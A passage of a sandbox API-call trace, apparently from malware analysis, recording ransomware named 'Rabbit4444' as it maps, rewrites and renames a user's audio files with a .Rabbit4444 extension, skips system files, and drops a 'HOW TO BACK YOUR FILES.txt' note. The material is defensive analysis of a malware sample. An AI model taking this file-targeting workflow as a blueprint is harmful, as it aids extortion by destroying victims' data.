dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.283] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14059390081) returned 1 [0049.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0049.283] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.284] CloseHandle (hObject=0x298) returned 1 [0049.284] CloseHandle (hObject=0x278) returned 1 [0049.287] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\WYQAYXsDjvTvV PGyfOr.m4a.Rabbit4444") returned 78 [0049.287] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\WYQAYXsDjvTvV PGyfOr.m4a" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\wyqayxsdjvtvv pgyfor.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\WYQAYXsDjvTvV PGyfOr.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\wyqayxsdjvtvv pgyfor.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.287] InterlockedExchangeAdd (in: Addend=0xff618, Value=83264 | out: Addend=0xff618) returned 20453520 [0049.287] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3560 [0049.287] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb6ce740, ftCreationTime.dwHighDateTime=0x1d4d139, ftLastAccessTime.dwLowDateTime=0x266783c0, ftLastAccessTime.dwHighDateTime=0x1d4cd21, ftLastWriteTime.dwLowDateTime=0x266783c0, ftLastWriteTime.dwHighDateTime=0x1d4cd21, nFileSizeHigh=0x0, nFileSizeLow=0x14540, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WYQAYXsDjvTvV PGyfOr.m4a", cAlternateFileName="WYQAYX~1.M4A")) returned 0 [0049.287] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0049.287] lstrcpyW (in: lpString1=0x130eb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.287] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.288] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.288] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.290] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.290] CloseHandle (hObject=0x278) returned 1 [0049.290] CloseHandle (hObject=0x27c) returned 1 [0049.290] GetCurrentThreadId () returned 0xd98 [0049.290] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0049.291] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\ddgoRP", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\ddgoRP") returned="C:\\Users\\FD1HVy\\Music\\ddgoRP" [0049.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115000 | out: hHeap=0xe0000) returned 1 [0049.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0049.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\ddgoRP" | out: lpString1="C:\\Users\\FD1HVy\\Music\\ddgoRP") returned="C:\\Users\\FD1HVy\\Music\\ddgoRP" [0049.291] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\ddgoRP", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\") returned="C:\\Users\\FD1HVy\\Music\\ddgoRP\\" [0049.291] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\ddgoRP\\.BFC0E91B00AE8A0620D3" [0049.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.292] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.294] FlushFileBuffers (hFile=0x27c) returned 1 [0049.295] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.296] CloseHandle (hObject=0x27c) returned 1 [0049.296] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\ddgoRP") returned 28 [0049.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.296] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2857250, ftCreationTime.dwHighDateTime=0x1d4d165, ftLastAccessTime.dwLowDateTime=0x87fe0640, ftLastAccessTime.dwHighDateTime=0x1d4cddf, ftLastWriteTime.dwLowDateTime=0xe6b359b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0049.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.296] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.296] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.296] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.296] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2857250, ftCreationTime.dwHighDateTime=0x1d4d165, ftLastAccessTime.dwLowDateTime=0x87fe0640, ftLastAccessTime.dwHighDateTime=0x1d4cddf, ftLastWriteTime.dwLowDateTime=0xe6b359b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.297] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.297] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.297] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.297] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.297] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.297] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6b359b9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6b359b9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6b359b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.297] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.297] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.297] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2914d70, ftCreationTime.dwHighDateTime=0x1d4cc8f, ftLastAccessTime.dwLowDateTime=0x5223e760, ftLastAccessTime.dwHighDateTime=0x1d4ce2a, ftLastWriteTime.dwLowDateTime=0x5223e760, ftLastWriteTime.dwHighDateTime=0x1d4ce2a, nFileSizeHigh=0x0, nFileSizeLow=0x1707c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3faLNgmV.wav", cAlternateFileName="")) returned 1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="Rabbit4444.exe") returned -1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2=".") returned 1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="..") returned 1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="windows") returned -1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="bootmgr") returned -1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="pagefile.sys") returned -1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="boot") returned -1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="ids.txt") returned -1 [0049.297] lstrcmpiW (lpString1="3faLNgmV.wav", lpString2="NTUSER.DAT") returned -1 [0049.297] lstrcpyW (in: lpString1=0x130eb72, lpString2="3faLNgmV.wav" | out: lpString1="3faLNgmV.wav") returned="3faLNgmV.wav" [0049.297] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\3faLNgmV.wav", dwFileAttributes=0x0) returned 1 [0049.297] lstrlenW (lpString="3faLNgmV.wav") returned 12 [0049.297] lstrlenW (lpString="Rabbit4444") returned 10 [0049.297] lstrcmpiW (lpString1="aLNgmV.wav", lpString2="Rabbit4444") returned -1 [0049.297] lstrlenW (lpString=".dll") returned 4 [0049.297] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.297] lstrlenW (lpString=".lnk") returned 4 [0049.297] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.298] lstrlenW (lpString=".ini") returned 4 [0049.298] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.298] lstrlenW (lpString=".sys") returned 4 [0049.298] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\3faLNgmV.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\3falngmv.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.298] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.298] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14060854254) returned 1 [0049.298] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=94332) returned 1 [0049.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0049.298] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17380, lpName=0x0) returned 0x298 [0049.298] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17380) returned 0x70000 [0049.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.301] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14061155331) returned 1 [0049.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0049.301] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.302] CloseHandle (hObject=0x298) returned 1 [0049.302] CloseHandle (hObject=0x278) returned 1 [0049.305] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\3faLNgmV.wav.Rabbit4444") returned 52 [0049.305] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\3faLNgmV.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\3falngmv.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\3faLNgmV.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\3falngmv.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.305] InterlockedExchangeAdd (in: Addend=0xff618, Value=94336 | out: Addend=0xff618) returned 20536784 [0049.305] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3562 [0049.305] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc649e1c0, ftCreationTime.dwHighDateTime=0x1d4d4ca, ftLastAccessTime.dwLowDateTime=0x45afb370, ftLastAccessTime.dwHighDateTime=0x1d4cf46, ftLastWriteTime.dwLowDateTime=0x45afb370, ftLastWriteTime.dwHighDateTime=0x1d4cf46, nFileSizeHigh=0x0, nFileSizeLow=0x9c98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IFQuAHV5i3JZ nilsZg.mp3", cAlternateFileName="IFQUAH~1.MP3")) returned 1 [0049.305] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="Rabbit4444.exe") returned -1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2=".") returned 1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="..") returned 1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="windows") returned -1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="bootmgr") returned 1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="pagefile.sys") returned -1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="boot") returned 1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="ids.txt") returned 1 [0049.306] lstrcmpiW (lpString1="IFQuAHV5i3JZ nilsZg.mp3", lpString2="NTUSER.DAT") returned -1 [0049.306] lstrcpyW (in: lpString1=0x130eb72, lpString2="IFQuAHV5i3JZ nilsZg.mp3" | out: lpString1="IFQuAHV5i3JZ nilsZg.mp3") returned="IFQuAHV5i3JZ nilsZg.mp3" [0049.306] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\IFQuAHV5i3JZ nilsZg.mp3", dwFileAttributes=0x0) returned 1 [0049.306] lstrlenW (lpString="IFQuAHV5i3JZ nilsZg.mp3") returned 23 [0049.306] lstrlenW (lpString="Rabbit4444") returned 10 [0049.306] lstrcmpiW (lpString1="nilsZg.mp3", lpString2="Rabbit4444") returned -1 [0049.306] lstrlenW (lpString=".dll") returned 4 [0049.306] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.306] lstrlenW (lpString=".lnk") returned 4 [0049.306] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.306] lstrlenW (lpString=".ini") returned 4 [0049.306] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.306] lstrlenW (lpString=".sys") returned 4 [0049.306] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\IFQuAHV5i3JZ nilsZg.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ifquahv5i3jz nilszg.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.306] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.306] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14061726906) returned 1 [0049.307] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=40088) returned 1 [0049.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0049.307] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9fa0, lpName=0x0) returned 0x298 [0049.307] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9fa0) returned 0x70000 [0049.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.308] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14061914477) returned 1 [0049.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0049.308] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.309] CloseHandle (hObject=0x298) returned 1 [0049.309] CloseHandle (hObject=0x278) returned 1 [0049.311] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\IFQuAHV5i3JZ nilsZg.mp3.Rabbit4444") returned 63 [0049.311] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\IFQuAHV5i3JZ nilsZg.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ifquahv5i3jz nilszg.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\IFQuAHV5i3JZ nilsZg.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ifquahv5i3jz nilszg.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0049.311] InterlockedExchangeAdd (in: Addend=0xff618, Value=40096 | out: Addend=0xff618) returned 20631120 [0049.312] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3565 [0049.312] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f806250, ftCreationTime.dwHighDateTime=0x1d4ce4f, ftLastAccessTime.dwLowDateTime=0x540c92f0, ftLastAccessTime.dwHighDateTime=0x1d4d1ab, ftLastWriteTime.dwLowDateTime=0x540c92f0, ftLastWriteTime.dwHighDateTime=0x1d4d1ab, nFileSizeHigh=0x0, nFileSizeLow=0x14489, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJM5 PvfbTCo- In.wav", cAlternateFileName="IJM5PV~1.WAV")) returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="Rabbit4444.exe") returned -1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2=".") returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="..") returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="windows") returned -1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="bootmgr") returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="pagefile.sys") returned -1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="boot") returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="ids.txt") returned 1 [0049.312] lstrcmpiW (lpString1="iJM5 PvfbTCo- In.wav", lpString2="NTUSER.DAT") returned -1 [0049.312] lstrcpyW (in: lpString1=0x130eb72, lpString2="iJM5 PvfbTCo- In.wav" | out: lpString1="iJM5 PvfbTCo- In.wav") returned="iJM5 PvfbTCo- In.wav" [0049.312] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\iJM5 PvfbTCo- In.wav", dwFileAttributes=0x0) returned 1 [0049.312] lstrlenW (lpString="iJM5 PvfbTCo- In.wav") returned 20 [0049.312] lstrlenW (lpString="Rabbit4444") returned 10 [0049.312] lstrcmpiW (lpString1="Co- In.wav", lpString2="Rabbit4444") returned -1 [0049.312] lstrlenW (lpString=".dll") returned 4 [0049.312] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.312] lstrlenW (lpString=".lnk") returned 4 [0049.312] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.312] lstrlenW (lpString=".ini") returned 4 [0049.312] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.312] lstrlenW (lpString=".sys") returned 4 [0049.312] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.312] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\iJM5 PvfbTCo- In.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ijm5 pvfbtco- in.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.313] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.313] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14062335644) returned 1 [0049.313] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83081) returned 1 [0049.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0049.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0049.313] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14790, lpName=0x0) returned 0x298 [0049.313] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14790) returned 0x70000 [0049.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.315] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14062603872) returned 1 [0049.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0049.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0049.315] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.316] CloseHandle (hObject=0x298) returned 1 [0049.316] CloseHandle (hObject=0x278) returned 1 [0049.319] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\iJM5 PvfbTCo- In.wav.Rabbit4444") returned 60 [0049.319] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\iJM5 PvfbTCo- In.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ijm5 pvfbtco- in.wav"), 